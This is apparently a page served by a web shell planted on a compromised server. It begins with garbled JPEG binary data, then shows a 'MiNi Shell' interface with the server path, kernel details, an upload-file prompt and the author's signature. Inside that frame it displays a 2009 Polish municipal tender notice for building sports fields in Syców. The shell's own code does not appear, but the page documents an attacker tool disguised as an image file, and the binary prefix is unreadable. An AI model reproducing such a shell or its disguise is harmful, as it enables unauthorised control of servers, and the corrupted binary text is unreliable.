JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090831/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090831/143765-N-2009.html

<p class="kh_header"><b>Syców: Budowa wielofunkcyjnych boisk sportowych ogólnie dostępnych dla  dzieci i młodzieży   przy ul.Komorowskiej  w Sycowie</b><br>
<b>Numer ogłoszenia: 143765 - 2009; data zamieszczenia: 31.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Syców , ul. Mickiewicza 1, 56-500 Syców, woj. dolnośląskie, tel. 062 7855118, faks 062 7855104.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.sycow.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa wielofunkcyjnych boisk sportowych ogólnie dostępnych dla  dzieci i młodzieży   przy ul.Komorowskiej  w Sycowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja polegająca na budowie kompleksu sportowego w ramach Programu Budowa wielofunkcyjnych boisk sportowych ogólnie dostępnych dla  dzieci i młodzieży przy ul.Komorowskiej  w Sycowie 
 Zakres przedmiotu zamówienia obejmuje w szczególności:
1)	Wykonanie boiska wielofunkcyjnego do gry w piłkę koszykową, siatkówkę oraz  z piłką ręczną,
2)	Wykonanie ogrodzenia kompleksu boisk z bramą technologiczną i bramkami wejściowymi o wysokości  400 cm.,
3)	Wykonanie oświetlenia nocnego boisk, maszty oświetleniowe o wysokości 12 m,
4)	Wykonanie komunikacji wewnętrznej  (nawierzchnia  i opaska z kostki brukowej),
5)	Dostawie i montażu wyposażenia boisk w piłkochwyty, bramki do piłki ręcznej, słupki boiskowe z chorągiewkami, chorągiewki sędziowskie, kosze do piłki koszykowej, słupki do siatkówki z siatką, siedzisko sędziego do piłki siatkowej,  ławki,  kosze na odpadki: 
6)	Wykonanie  małej architektury: ławki, kosze na śmieci.
7)	Wykonanie odwodnienia boisk,
8)	Wykonanie przyłącza wodno - kanalizacyjnego, deszczowego, energetycznego oraz likwidacja kolizji z napowietrzną siecią energetyczną..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.00.00-1, 45.23.30.00-9, 45.21.22.10-1, 45.21.20.00-6, 45.11.27.10-5, 45.31.10.00-0, 45.23.14.00-9, 45.31.60.00-5, 45.23.24.00-6, 45.24.41.00-0, 45.22.33.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> wymagane w kwocie 10.000 PLN
słownie złotych: dziesięć tysięcy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
	są uprawnieni do występowania w obrocie prawnym zgodnie z wymaganiami Prawa zamówień publicznych,
	posiadają uprawnienia niezbędne do wykonania prac będących przedmiotem zamówienia,
	posiadają niezbędną wiedzę i doświadczenie, oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, i/lub przedstawią zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
	nie podlegają wykluczeniu z postępowania na podstawie art. 24 Prawa zamówień  publicznych,
	zgodnie z art. 26 ust. 2 załączą dokument wymieniony w § 1 ust. 1 pkt. 2 i 3 i ust. 2 pkt. 1, 5 i /lub 5a i 6 ust. 3 pkt. 3  § 3 ust 1 pkt 2- 4 i/lub ust. 2 i/lub 3. Rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87  poz. 605 ze zm.)
	w okresie ostatnich 5 lat przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali min 2 zadania, odpowiadające swoim rodzajem i wartością robotom budowlanym polegających na budowie boisk sportowych, w tym:  jednego boiska z nawierzchnią poliuretenową o łącznej wartości min. 500.000,00 zł brutto. 
	dołączą dokumenty (referencje lub inny dokument) od poprzednich Zamawiających potwierdzające, że wykazane roboty zostały wykonane należycie, 
	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia posiadającymi kwalifikacje niezbędne do wykonania zamówienia, tj. minimum 1 pracownikiem z uprawnieniami do wykonywania samodzielnych funkcji w branżach:
	konstrukcyjno-budowlanej,
mogącym wykazać się decyzjami o stwierdzeniu przygotowania zawodowego do pełnienia samodzielnych   funkcji technicznych w budownictwie oraz przynależnością do właściwej Izby Samorządu Zawodowego
	W przypadku przedstawienia wykazu osób którymi będzie dysponował Wykonawca winno być załączone zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.

	są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie niższą niż 500.000,00 zł.

	Wpłacą wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy złotych)

	Dołączą oświadczenia lub dokumenty potwierdzające spełnianie warunków jakościowych oferowanej trawy,

	akceptują warunki zawarte w niniejszej specyfikacji.

	Ocena spełnienia warunków odbędzie się na podstawie przedstawionych dokumentów i oświadczeń na zasadzie spełnia nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 3. WYMAGANE DOKUMENTY
3.1.	Wypełniony formularz oferty (wg wzoru załącznika nr 1 do SIWZ),
3.1.1. zgodnie z art. 26 ust. 2 załączą dokumenty wymieniony w § 1 ust. 1 pkt. 2 i 3 i ust. 2 pkt. 1, 5 i lub 5a i 6 ust. 3 pkt. 3; §3 ust 1 pkt 2- 4 ilub ust. 2 ilub 3 rozporządzenia Prezesa Rady Ministrów z dnia 19.05.2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. z 2006 r. Nr 87  poz. 605 ze zm.) tj, 
a) Aktualny odpis z  właściwego  rejestru albo aktualnego zaświadczenia o wpisie do  ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b)	 Aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego, potwierdzające, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
c)	Aktualne zaświadczenie oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.1.2.  W przypadku  podmiotów występujących wspólnie o udzielenie zamówienia dokument ustanawiający pełnomocnika do reprezentowania lub reprezentowania 
i podpisania umowy zgodnie z art. 23 ustawy 
W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia, dokumenty wymienione  pkt. 3.1.1 i 3.2 winien dołączyć każdy podmiot występujący wspólnie.
3.1.3.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w  pkt 3.1.1., składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
	a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
   b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
3.1.4. Dokumenty o których mowa w pkt 3.1.3 lit. a, b - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, winny zostać złożone w formie oryginału, odpisu, wypisu, wyciągu lub kopii przetłumaczone na język polski.  
Dokumenty sporządzone w języku obcym, inne niż określone w pkt 3.1.1 są składane wraz z tłumaczeniem na język polski.   
3.2.Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 Prawa zamówień publicznych oraz że nie podlega wykluczeniu z postępowania na podstawie Art. 24 Ustawy - zgodnie z formularzem stanowiącym załącznik nr 2 do SIWZ.

3.3. Kosztorys ofertowy (załącznik Nr 3 do SIWZ)

3.4.  Wykaz wykonanych w ciągu  ostatnich 5 lat a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie robót budowlanych, wg. wzoru określonego w załączniku nr 4 do SIWZ Doświadczenie zawodowe. 
3.5. Dokumenty (referencje lub równoważny inny dokument) od poprzednich zamawiających potwierdzający, że wykazane roboty budowlane w załączniku Nr 4, zostały wykonane należycie.
3.6. Wykaz osób którymi dysponuje lub będzie dysponował Wykonawca do realizacji zadania wraz z załączeniem wymaganych uprawnień oraz zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego - załącznik Nr 5.
3.6.1. W przypadku przedstawienia wykazu osób którymi będzie dysponował Wykonawca winno być załączone zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
3.7. Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca ubezpieczony jest od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
3.8. Dowód wpłaty wadium, w przypadku wpłaty pieniężnej potwierdzenie wpłaty - dokument np. odcinek ostemplowany przez bank, potwierdzający wpłatę przelewem środków finansowych na konto Zamawiającego, w przypadku pozostałych form wniesienia wadium oryginał dokumentu należy złożyć w kasie Urzędu Miasta i Gminy , zaś do oferty dołączyć kopię dokumentu. Jeśli Wykonawca prześle ofertę pocztą winien kopię dowodu wniesienia wadium załączyć do oferty, natomiast oryginał umieścić w oznaczonej kopercie  oryginał dowodu wniesienia wadium.
3.9.  Zaakceptowany  projekt umowy - załącznik nr 6  do SIWZ.

3.10 Oświadczenia lub dokumenty potwierdzające spełnianie warunków jakościowych,  dotyczące nawierzchni  poliuretanowej. tj. 
A.	Dokumenty dotyczące nawierzchni poliuretanowej:

a)  Badania na zgodność z normą PN-EN 14877:2008, lub aprobata  techniczna ITB,  lub   rekomendacja techniczna ITB  lub wynik badań specjalistycznego laboratorium badającego nawierzchnie sportowe, np. Labosport,
b) Barta techniczna oferowanej nawierzchni potwierdzona przez jej producenta,
c)   Atest PZH dla ofiarowanej nawierzchni,
d) Autoryzacja producenta nawierzchni poliuretanowej, wystawiona dla wykonawcy na realizowaną inwestycję wraz z potwierdzeniem gwarancji udzielonej przez producenta  na tą nawierzchnię,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.sycow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Miasta i Gminy 
ul. Mickiewicza  1
56-500  Syców
pokój nr 14 lub 17.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2009 godzina 09:00, miejsce: Urzad Miasta i Gminy 
ul. Mickiewicza  1
56-500  Syców
pokój nr 24  - sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com